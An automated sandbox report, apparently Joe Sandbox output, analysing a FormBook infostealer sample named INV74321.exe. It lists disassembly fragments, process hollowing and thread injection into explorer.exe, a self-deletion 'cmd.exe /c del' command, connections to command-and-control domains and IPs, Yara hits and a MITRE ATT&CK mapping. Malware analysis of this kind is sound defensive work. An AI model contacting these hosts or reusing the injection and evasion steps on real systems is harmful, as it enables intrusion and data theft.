          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03749100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03749100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03749100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037D41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037761A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037761A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03772990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0376C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03760050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03760050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0375B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0375B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0375B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0375B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03814015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03814015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037458EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037DB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037DB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037DB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037DB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037DB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037DB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037890AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03802073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03749080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03811074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0375FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0375EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03744F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03744F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0376F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037DFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037DFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0381070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0381070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037837F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03758794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03818F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0376AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0376AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0376AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0376AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0376AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0375766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03810EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03810EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03810EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03757E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03757E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03757E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03757E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03757E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03757E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037FFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03818ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03778E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03801608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037716E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037576E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037736CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037FFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03788EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0380AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0380AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037DFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0376C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0376C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03767D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_038105AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_038105AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03783D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03753D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03753D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03753D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03753D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03753D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03753D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03753D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03753D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03753D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03753D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03753D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03753D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03753D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037CA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03774D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03774D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03774D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0380FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0380FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0380FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0380FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037F8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0375D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0375D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03818D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0380E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03771DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03771DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03771DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037735A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03772581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03772581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03772581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03772581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03742D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03742D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03742D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03742D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\wlanext.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.aqayeseo.com
          Source: C:\Windows\explorer.exeDomain query: www.downtoearthwork.com
          Source: C:\Windows\explorer.exeDomain query: www.shebagholdings.com
          Source: C:\Windows\explorer.exeNetwork Connect: 119.18.54.126 80
          Source: C:\Windows\explorer.exeDomain query: www.booweats.com
          Source: C:\Windows\explorer.exeDomain query: www.0o-a-8v4l76.net
          Source: C:\Windows\explorer.exeDomain query: www.topcasino-111.com
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.46.55 80
          Source: C:\Windows\explorer.exeDomain query: www.lingoblasterdiscount.com
          Source: C:\Windows\explorer.exeNetwork Connect: 154.84.101.247 80
          Source: C:\Windows\explorer.exeDomain query: www.smartmatch-dating-api.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeDomain query: www.xn--espacesacr-k7a.com
          Source: C:\Windows\explorer.exeNetwork Connect: 64.190.62.111 80
          Source: C:\Windows\explorer.exeDomain query: www.king-jackpot.com
          Source: C:\Windows\explorer.exeNetwork Connect: 87.98.148.38 80
          Source: C:\Windows\explorer.exeNetwork Connect: 163.43.122.109 80
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\INV74321.exeSection loaded: unknown target: C:\Users\user\Desktop\INV74321.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\INV74321.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\INV74321.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\INV74321.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\INV74321.exeThread register set: target process: 3388
          Source: C:\Windows\SysWOW64\wlanext.exeThread register set: target process: 3388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\INV74321.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\INV74321.exeSection unmapped: C:\Windows\SysWOW64\wlanext.exe base address: D90000
          Source: C:\Users\user\Desktop\INV74321.exeProcess created: C:\Users\user\Desktop\INV74321.exe 'C:\Users\user\Desktop\INV74321.exe'
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\INV74321.exe'
          Source: explorer.exe, 00000005.00000002.473046481.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
          Source: explorer.exe, 00000005.00000000.220866561.0000000001980000.00000002.00000001.sdmp, wlanext.exe, 00000008.00000002.475564298.0000000005E50000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000005.00000000.238911410.000000000871F000.00000004.00000001.sdmp, wlanext.exe, 00000008.00000002.475564298.0000000005E50000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.220866561.0000000001980000.00000002.00000001.sdmp, wlanext.exe, 00000008.00000002.475564298.0000000005E50000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.220866561.0000000001980000.00000002.00000001.sdmp, wlanext.exe, 00000008.00000002.475564298.0000000005E50000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.473119363.00000000035D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.257388268.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.257352957.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.473219825.0000000003600000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.215550153.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.1.INV74321.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.INV74321.exe.29a0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.INV74321.exe.29a0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.INV74321.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.473119363.00000000035D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.257388268.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.257352957.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.473219825.0000000003600000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.215550153.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.1.INV74321.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.INV74321.exe.29a0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.INV74321.exe.29a0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.INV74321.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionAccess Token Manipulation1Virtualization/Sandbox Evasion3OS Credential DumpingSecurity Software Discovery231Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection512Access Token Manipulation1LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection512Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information3LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing11Cached Domain CredentialsSystem Information Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 411840 Sample: INV74321.exe Startdate: 12/05/2021 Architecture: WINDOWS Score: 100 31 www.cylindberg.com 2->31 33 www.painteredmond.com 2->33 41 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->41 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 4 other signatures 2->47 11 INV74321.exe 18 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\Local\Temp\...\q7pl.dll, PE32 11->29 dropped 57 Detected unpacking (changes PE section rights) 11->57 59 Maps a DLL or memory area into another process 11->59 61 Tries to detect virtualization through RDTSC time measurements 11->61 15 INV74321.exe 11->15         started        signatures6 process7 signatures8 63 Modifies the context of a thread in another process (thread injection) 15->63 65 Maps a DLL or memory area into another process 15->65 67 Sample uses process hollowing technique 15->67 69 Queues an APC in another process (thread injection) 15->69 18 explorer.exe 15->18 injected process9 dnsIp10 35 www.0o-a-8v4l76.net 163.43.122.109, 49733, 80 SAKURA-BSAKURAInternetIncJP Japan 18->35 